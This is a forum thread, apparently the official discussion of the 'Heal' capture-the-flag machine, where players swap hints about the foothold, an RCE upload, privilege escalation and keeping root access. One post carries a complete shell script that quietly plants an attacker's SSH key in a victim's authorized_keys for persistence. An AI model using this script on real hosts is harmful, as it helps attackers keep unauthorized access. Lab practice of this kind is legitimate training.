Official Heal Discussion

Can anyone give me some info on what the path from foothold to user was? I have rooted the box from what might be an unintended path. Feel free to DM.

I got root but I'm not able to get persistence over the root account… any help/hint, guys?

Generate an SSH key. You need to be quick though :grinning:

Thanks, I managed to add my keys into authorized_keys… but if I keep my listener open it returns the shell again in a loop…

I had the same issue, but once you have generated an SSH key you can maintain persistence that way.
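The persistence step the two posts above hint at (drop your own public key into the target user's authorized_keys) is easy to get subtly wrong: sshd's StrictModes silently refuses a key file with loose permissions, and re-running a one-liner appends the key again on every shell you catch. The following is an added example written for this thread, not code from the box or from any poster; it assumes the key pair was already generated with ssh-keygen on the attacking machine and takes the public-key line and the target .ssh directory as arguments so it can be exercised against a scratch directory. The key string inside demo() is constructed and not a real key.

```shell
#!/bin/sh
# Added example for the thread: idempotently install an SSH public key
# for persistence on a host where you already hold a shell as that user.
# Assumptions (mine, not the thread's): the key pair was generated with
# ssh-keygen on the attacking machine; $2 is the full .pub line.

# install_pubkey <ssh_dir> <pubkey_line>
# Creates <ssh_dir>/authorized_keys with the permissions sshd insists on
# (700 on the directory, 600 on the file; StrictModes rejects anything
# group/world-writable) and appends the key only if it is not already
# present, so calling this from a looping reverse shell never duplicates it.
install_pubkey() {
    ssh_dir="$1"
    pubkey="$2"
    auth="$ssh_dir/authorized_keys"

    mkdir -p "$ssh_dir" || return 1
    chmod 700 "$ssh_dir"
    [ -f "$auth" ] || : > "$auth"
    chmod 600 "$auth"

    # -F: literal match, -x: whole line, so a key that is a substring of
    # another entry is not mistaken for an existing copy.
    if ! grep -Fxq -- "$pubkey" "$auth"; then
        printf '%s\n' "$pubkey" >> "$auth"
    fi
}

# count_key <ssh_dir> <pubkey_line>: number of exact copies of the key
# in authorized_keys (used to confirm the install is idempotent).
count_key() {
    grep -Fxc -- "$2" "$1/authorized_keys"
}

# Demonstration against a throwaway directory with a constructed key line.
demo() {
    tmp="$(mktemp -d)"
    key='ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedExampleKeyNotRealXXXX attacker@kali'
    install_pubkey "$tmp/.ssh" "$key"
    install_pubkey "$tmp/.ssh" "$key"   # second call must be a no-op
    count_key "$tmp/.ssh" "$key"        # prints 1
    rm -rf "$tmp"
}
```

On the real target you would call install_pubkey with the victim user's home (for example "$HOME/.ssh") and then connect with `ssh -i <private_key> user@host`, which survives the web shell being killed or respawned.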

I’ve just taken another look at this. There is a small modification you can make to the script that you are uploading to the web service. The field you are looking for is quite obvious, as it specifies a timeout value…

Anyone, please help. I got the www-data shell and found a *****sql in the processes, but I am stuck here on how to privesc from this point.

Maybe try taking a closer look at the other interesting processes running that we could potentially exploit.

something like a port starting with 8***

Looks interesting to me :slight_smile:

Can you give a hint? :upside_down_face:

Feel free to DM me with what you’ve found out/what you’ve already tried and I’ll be able to help give you some guidance :slight_smile:

I have SSH with the user’s credentials but I don't know where to go from here to get root privileges. I used netstat to identify ports and ps aux, but I can’t find a path. I tried doing some port forwarding but it is not working. I read the other comments but I do not get it. What am I doing wrong???

I’m having problems accessing the RCE file. It is already uploaded but I cannot find its URL. Any help/hints? I’ve tried all the common ones, including the exploit.py, but none has worked.

Glad to see a box I can finally do on my own :smiling_face_with_tear: Just got user; not too bad, but I think I just got lucky with my enum. Do the usual enum and you’ll find what you’re looking for in terms of foothold.

Hi, can you help me with the invalid token thing? I'm not able to understand what's wrong.

Stuck at api.heal.htb, found api.heal.htb/download, but can’t figure out what to do next. Any hint would be appreciated.

Hi, I am stuck at the foothold and can’t find anything to privesc. Any hints or help?

How do you know the app is running on Ruby on Rails?